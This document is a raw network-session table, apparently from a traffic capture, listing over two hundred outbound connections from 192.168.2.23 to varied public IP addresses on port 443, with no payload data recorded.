                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11741192.168.2.2347136110.101.32.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11742192.168.2.235585841.28.122.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11743192.168.2.2354088149.201.16.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11744192.168.2.2344176192.42.50.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11745192.168.2.2344672205.226.45.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11746192.168.2.2352896186.209.190.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11747192.168.2.2332814182.9.205.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11748192.168.2.2353660172.81.92.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11749192.168.2.2351196137.202.155.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11750192.168.2.2338680209.146.190.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11751192.168.2.2343318112.142.96.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11752192.168.2.235310084.7.81.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11753192.168.2.2335448221.132.235.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11754192.168.2.236096668.251.34.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11755192.168.2.2334906112.201.179.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11756192.168.2.234825254.21.230.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11757192.168.2.2343270151.136.147.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11758192.168.2.235268232.3.120.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11759192.168.2.2337478187.179.14.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11760192.168.2.2333052163.47.43.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11761192.168.2.235928034.110.217.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11762192.168.2.2344534199.138.234.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11763192.168.2.2347482222.123.165.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11764192.168.2.235381894.252.75.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11765192.168.2.2348788129.95.228.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11766192.168.2.234023691.241.119.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11767192.168.2.235798693.17.134.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11768192.168.2.2347354148.119.17.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11769192.168.2.235248647.201.63.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11770192.168.2.2336326186.146.18.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11771192.168.2.2338360196.157.58.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11772192.168.2.234465875.133.24.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11773192.168.2.236036660.177.235.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11774192.168.2.2356994106.165.167.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11775192.168.2.23472788.132.213.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11776192.168.2.2337466145.50.200.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11777192.168.2.2352336197.69.254.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11778192.168.2.2335694178.197.120.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11779192.168.2.2347212159.50.7.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11780192.168.2.235389697.132.53.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11781192.168.2.235963862.184.3.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11782192.168.2.2333548169.160.254.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11783192.168.2.2360526122.19.148.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11784192.168.2.233569244.90.220.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11785192.168.2.235800461.6.9.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11786192.168.2.2342130174.90.221.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11787192.168.2.2358284175.57.161.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11788192.168.2.2335730210.19.102.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11789192.168.2.2360604219.218.5.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11790192.168.2.2338820191.212.216.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11791192.168.2.2360810105.171.149.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11792192.168.2.234941096.182.213.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11793192.168.2.2355528203.48.106.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11794192.168.2.2355638208.168.203.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11795192.168.2.233897488.85.144.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11796192.168.2.2345328121.95.143.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11797192.168.2.2356358122.26.251.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11798192.168.2.235724090.88.244.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11799192.168.2.2339528196.204.118.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11800192.168.2.2352216202.149.98.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11801192.168.2.2360082176.77.255.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11802192.168.2.2344974162.194.20.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11803192.168.2.2357592172.105.12.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11804192.168.2.2340402113.169.40.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11805192.168.2.2335538185.237.151.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11806192.168.2.233974219.149.38.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11807192.168.2.234930089.142.193.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11808192.168.2.234308838.67.69.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11809192.168.2.2335836104.251.185.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11810192.168.2.234780288.139.119.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11811192.168.2.235724448.204.0.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11812192.168.2.235336881.138.90.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11813192.168.2.2357618118.191.68.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11814192.168.2.235291217.75.220.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11815192.168.2.234519478.169.88.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11816192.168.2.2347184187.137.254.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11817192.168.2.2348566191.254.149.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11818192.168.2.2353092197.100.174.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11819192.168.2.2343676209.254.91.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11820192.168.2.2351838191.187.108.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11821192.168.2.2355676222.73.248.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11822192.168.2.236099848.251.199.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11823192.168.2.2333396175.6.130.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11824192.168.2.234810412.18.45.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11825192.168.2.2335376153.24.109.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11826192.168.2.235257253.70.93.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11827192.168.2.233455278.248.45.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11828192.168.2.2353562135.135.64.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11829192.168.2.2333794198.85.58.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11830192.168.2.235419012.208.126.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11831192.168.2.2357208143.113.190.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11832192.168.2.2344688100.5.141.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11833192.168.2.235085874.69.111.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11834192.168.2.2353022167.134.175.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11835192.168.2.2347226155.154.236.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11836192.168.2.2337788123.146.68.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11837192.168.2.234005274.201.155.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11838192.168.2.233983641.115.234.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11839192.168.2.23391328.104.15.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11840192.168.2.2341324177.144.42.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11841192.168.2.233691095.199.177.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11842192.168.2.233305671.153.209.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11843192.168.2.2354146223.19.18.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11844192.168.2.2348496189.156.64.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11845192.168.2.233505861.77.221.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11846192.168.2.233422262.225.70.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11847192.168.2.2359918187.93.84.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11848192.168.2.23341865.66.49.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11849192.168.2.235346246.127.123.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11850192.168.2.235318636.95.43.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11851192.168.2.2343348142.119.109.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11852192.168.2.2340070122.220.173.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11853192.168.2.234055642.114.160.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11854192.168.2.2351700154.225.252.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11855192.168.2.23479529.170.20.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11856192.168.2.2349146118.167.131.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11857192.168.2.233586492.115.0.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11858192.168.2.2353918119.93.42.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11859192.168.2.234145858.19.54.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11860192.168.2.2351882201.85.196.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11861192.168.2.233629691.1.34.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11862192.168.2.2355048132.30.91.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11863192.168.2.2347058126.120.6.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11864192.168.2.2353324142.141.107.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11865192.168.2.2359988104.21.52.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11866192.168.2.2349368130.141.254.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11867192.168.2.23340389.23.113.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11868192.168.2.236097035.187.86.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11869192.168.2.2359144222.64.168.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11870192.168.2.235761288.175.205.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11871192.168.2.2356176184.165.158.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11872192.168.2.2360918142.128.78.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11873192.168.2.235934846.49.232.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11874192.168.2.23394609.254.204.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11875192.168.2.233979062.80.214.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11876192.168.2.2345234198.70.0.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11877192.168.2.235333213.109.126.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11878192.168.2.2344344198.193.240.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11879192.168.2.2339246205.29.83.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11880192.168.2.234280890.124.245.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11881192.168.2.2348498163.199.130.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11882192.168.2.2349086191.14.118.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11883192.168.2.2347258146.147.189.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11884192.168.2.2355610125.12.40.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11885192.168.2.233486858.79.99.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11886192.168.2.235579084.6.181.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11887192.168.2.233789854.47.245.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11888192.168.2.234208499.160.55.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11889192.168.2.2353288150.175.204.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11890192.168.2.234727641.59.44.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11891192.168.2.2350906161.87.229.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11892192.168.2.2346056148.213.37.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11893192.168.2.2353136174.180.219.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11894192.168.2.2348546159.163.214.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11895192.168.2.235623074.73.21.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11896192.168.2.2351252217.76.175.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11897192.168.2.2358674111.232.23.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11898192.168.2.2354872197.77.249.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11899192.168.2.2360116121.208.194.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11900192.168.2.2351622199.111.186.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11901192.168.2.2343482156.143.178.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11902192.168.2.2342088166.135.96.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11903192.168.2.235500486.242.69.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11904192.168.2.2339216199.244.133.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11905192.168.2.234004868.247.57.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11906192.168.2.2354550103.104.111.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11907192.168.2.2358444156.55.132.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11908192.168.2.2342360142.72.174.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11909192.168.2.234676043.224.218.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11910192.168.2.2353096151.67.39.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11911192.168.2.234785467.176.60.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11912192.168.2.2338890172.171.191.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11913192.168.2.2346966126.60.61.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11914192.168.2.234905218.211.113.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11915192.168.2.2340724149.5.51.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11916192.168.2.235716692.16.95.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11917192.168.2.23408184.161.147.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11918192.168.2.2359292108.32.179.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11919192.168.2.233509884.19.198.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11920192.168.2.2348196111.39.107.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11921192.168.2.235352249.6.160.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11922192.168.2.2348460128.50.24.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11923192.168.2.233323432.182.201.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11924192.168.2.233489273.70.5.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11925192.168.2.23521264.178.86.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11926192.168.2.2353536148.42.130.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11927192.168.2.2357690209.52.200.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11928192.168.2.2356554189.200.193.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11929192.168.2.235176093.9.86.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11930192.168.2.2357186172.14.24.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11931192.168.2.2355392182.76.154.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11932192.168.2.2354310128.3.27.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11933192.168.2.2345824157.76.19.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11934192.168.2.233954888.137.69.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11935192.168.2.233300468.7.38.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11936192.168.2.2354126204.102.197.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11937192.168.2.234933870.194.30.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11938192.168.2.234988475.54.77.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11939192.168.2.2335520102.154.195.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11940192.168.2.234818642.109.224.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11941192.168.2.233465092.61.174.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11942192.168.2.2356930212.152.84.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11943192.168.2.235027858.34.38.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11944192.168.2.233812865.144.58.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11945192.168.2.2336756115.238.147.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11946192.168.2.2357152118.89.32.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11947192.168.2.2349400200.180.146.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11948192.168.2.235584234.0.218.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11949192.168.2.2342028181.49.4.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11950192.168.2.2350994196.49.75.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11951192.168.2.235494831.188.217.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11952192.168.2.2351172164.136.4.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11953192.168.2.235616483.105.149.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11954192.168.2.2344282166.44.183.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11955192.168.2.2350448107.115.25.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11956192.168.2.23506841.104.143.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11957192.168.2.2346374201.80.130.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11958192.168.2.234089053.77.186.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11959192.168.2.234261891.198.115.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11960192.168.2.2359964201.230.220.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11961192.168.2.234660840.184.124.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11962192.168.2.2341586142.152.148.249443
